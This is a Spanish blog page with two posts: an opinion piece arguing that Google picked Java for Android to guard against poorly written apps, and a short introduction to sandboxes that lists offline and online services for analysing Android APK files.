Hacía varios días que esta entrada estaba a la espera de ser redactada, y recién hoy que estaba husmeando un poco el framework de un amigo que realmente se ve muy muy prometedor, tengo que admitir que si su framework ve la luz mi publicación de los frameworks son una basura tendrá que ser retractada, analizando su código me surgieron algunas preguntas sobre como encararía ciertos aspectos, que para avisarles me dejó realmente satisfecho, al final de la charla surgió el gran dilema del a industria y quizá el soporte en el cual está apoyada esta entrada. ¿Mi código debe ser a prueba de idiotas, o para gente que tenga conciencia de lo que programa?

La respuesta más rápida que uno se pudiera figurar es "pues lo hago para programadores que tengan una idea de lo que hacen, si programan horrible no es mi culpa", pero entonces podemos analizar las distintas posturas que se tomaron en la industria del software.

Todos los lectores de mi blog sabrán que todas las entradas aquí son desde el punto de vista de software para desarrollo de carácter industrial, de modo que se trata de que las mismas sigan como mínimo apoyadas en los criterios de calidad que se explican aquí.

Ahora bien, todos mis códigos o los que se evalúan en este blog tienen la tendencia a ser vendidos o utilizados por terceros, por lo que esta es una de las preguntas más serias, esos terceros ¿tengo que prever que sean unos estúpidos o programadores de verdad?, veamos entonces el panorama, tenemos lenguajes como C++ que realmente no están diseñados para suponer que el que programa no tiene idea de nada, por lo que los programas en C++, unos cuantos tienden a ser bastante inestables, o con problemas, salvo que su programador hubiese tenido bastante bien claro los conceptos básicos de calidad, entre otras cosas y que no se le escaparan muchas cosas, muchos lenguajes de ese tipo son ásperos y realmente pueden generar aplicaciones inestables, que no solo le afecten al funcionamiento del programa sino de la plataforma sobre la que corren.

En una época y actualmente el sistema de Microsoft (Windows) fue considerado muy poco estable y con muchos problemas, esto es debido en parte (y solo en parte) a la cantidad de programas que existen y que son instalados en éste sistema, y entre tantos siempre hay alguno programado por un inútil sin vida que pasa su tiempo escribiendo líneas de código sin pensar. Por eso microsoft cuando lanzó su propio lenguaje que lo representara implementó ciertas medidas preventivas para no aumentar aún más el caos en su plataforma, creando un lenguaje simple y fiable, para que sus aplicaciones no pudieran causar estragos, eso es parte de lo que es visual basic (como vimos en entradas anteriores hay otras orientaciones de visual basic pero todas apuntan directamente al caso donde sean programadores de poco conocimiento) aunque vuelvo a reiterar como en entradas anteriores no quiero que se me mal interprete asumiendo que yo digo que los programadores de visual basic no tienen conocimiento, solo quiero expresar que el público para el que fue diseñado cumple con estas características, pero no necesariamente todos los programadores del lenguaje cumplen dichas características. Pero esta lenguaje no es el único y por evidencia no todos los programadores para windows usan visual basic como main lenguaje.
Pero entonces aquí surge una pregunta que quizá la explicación de arriba pueda responderla, por qué google (si bien compró android a una empresa de terceros) mantuvo como lenguaje único del sistema y principal a Java, veamos el historial de google, analicemos sus propios servicios, sus programas, la gran mayoría y cuando se puede los hacen en python, una empresa que considera como su lenguaje principal a python, ¿por qué razón dejaría que uno de sus grandes productos use java?, aquí es cuando todos los amantes de java dicen a coro "porque java es lo mejor", si java fuera lo mejor que existe, ¿por que una empresa como google tendría todos sus servicios más importantes en python? ¿por qué daría cursos y promovería python? y sobre todo considerando que tienen su propio lenguaje. No seamos hipócritas, java no es ni de cerca el mejor lenguaje tiene miles de defectos y no entraré en detalle porque me iré del hilo principal demasiado.
Java es una de esas grandes decisiones de la industria, java tiene algo que google necesitaba en su sistema, google no podía correr con el mismo problema que tuvo microsoft con windows, no podían quedar como estúpidos sacando un sistema completamente inestable, tenían que asegurarse que todos los programadores que crearan aplicaciones para android no metieran la pata y le hicieran inestable, no podía tener esa fama, entonces tomaron la decisión de usar java, ya que java tiene la máquina virtual, un entorno controlado para que las aplicaciones corrieran, un entorno controlado por ellos que les permiten que si una aplicación hace un consumo un poquito fuera de los limites, esa aplicación sea finalizada, evitando cosas como el exceso de consumo de recursos.
Es una simple razón que le permite a la gente de google despreocuparse de que aparezca un programador idiota que consuma recursos de forma totalmente exagerada y tirara el sistema por los aires, ellos pueden controlar ese entorno y asegurarse de que las cosas no se salgan de la raya, dejando al sistema en un entorno aparte libre de sanguijuelas, monstruos y de mases.
Entonces podemos concluir que java es una decisión de google que no tiene nada que ver con la calidad del lenguaje, solo les asegura que aquellos que hagan aplicaciones para su sistema no les pongan las cosas inestables. La calidad son dos mangos a parte y realmente dudo mucho que pensaran en poner un lenguaje de calidad a la hora de elegir este lenguaje.
Recordemos también que las aplicaciones hechas por terceros son algo sumamente importante para un sistema, ya sea móvil o de escritorio, porque representa las utilidades extras y agregados que se le pueden prestar al usuario, y ganar puntos contra la competencia, por lo que permitir que para tu plataforma no solo programen gurús, sino también programadores medios, y hasta programadores estúpidos, aumenta la cantidad de desarrolladores, futuras aplicaciones y aumenta los puntos para con su competencia, dando así una ventaja estratégica muy importante.
Saludos!
Leer Mas
Ya vimos en anteriores entradas  un poco del tema y propiamente en la entrada pasada se hablamos sobre las cajas de arena a.k.a sandbox en el punto relacionado al análisis dinámico específicamente, hoy hablaremos de este tema debido a que las siguientes entradas estarán ya relacionadas al uso de las herramientas y el seteo del entorno respectivo.

http://www.hardwaremania.com/wp-content/uploads/2013/08/sandbox.png

¿Que es un Sandbox?

El sandbox es una tecnología que consiste en crear un área virtual entre un sistema y una aplicacion mayormente esta tecnica es usada para la deteccion e identificacion de malware, lo que realizan los antivirus, asi tambien los navegadores.

Entonces tambien tiene el denominativo de Sanbox una maquina virtual puesto que esta tiene caracteristicas propias de un SO como ser RAM, Bios, contando con un hardware disco duro y demas detalles todos estos debidamente simulados. Estos Sandbox tienen la capacidad de emular desde el arranque, carga del sistema, archivos, en realidad tal cual como seria un equipo real teniendo tambien la capacidad de crear unidades de disco duro.

Conociendo ya este concepto, continuar debemos....

Sanboxes Offline

DroidBox -  code.google.com/p/droidbox
DroidScope https://code.google.com/p/decaf-platform/wiki/DroidScope

Taint Droid - http://appanalysis.org/

Sanboxes Online


En este punto veremos un listado de Sandboxes, para realizar un análisis de los archivos apk de manera online es decir dejarlo a un tercero para que el se encargue del análisis  y nos muestre las llamadas y ejecuciones de los apks.



http://www.joesecurity.org/img/products/mobile-logo-big.pnghttp://www.foresafe.com/style/logo.pnghttps://www.visualthreat.com/common/images/android_icon.pngMobile-Sandbox MAINTENANCE MODEhttp://andrototal.org/img/andrototal_logo.pnghttp://copperdroid.isg.rhul.ac.uk/copperdroid/images/logo.png



- Anubis https://anubis.iseclab.org/
- Foresafe Online http://www.foresafe.com/scan
- Tracedroid http://tracedroid.few.vu.nl/
- VisualThreat - https://www.visualthreat.com/upload.action
- Mobile SandBox http://www.mobilesandbox.org
- SandDroid http://sanddroid.xjtu.edu.cn/
- Dexter https://dexter.bluebox.com/
- Joe SandBox Mobile http://www.joesecurity.org/joe-sandbox-mobile
- AndroTotal  http://andrototal.org/
- AndroidSandbox http://www.androidsandbox.net/

Debido a que no quise que la entrada ahi muera, encontre un paper el cual realiza una comparasión de los SandBox para Android el cual es:

Enter Sandbox: Android Sandbox Comparison


Entradas anteriores:

Laboratorio de Análisis de Aplicaciones Android I - Herramientas y Metodologías preparando el entorno 

Laboratorio de Análisis de Aplicaciones Android II - Análisis Estatico y Dinámico 


Falta la 2da entrada ya viene!

Regards,
Snifer
Leer Mas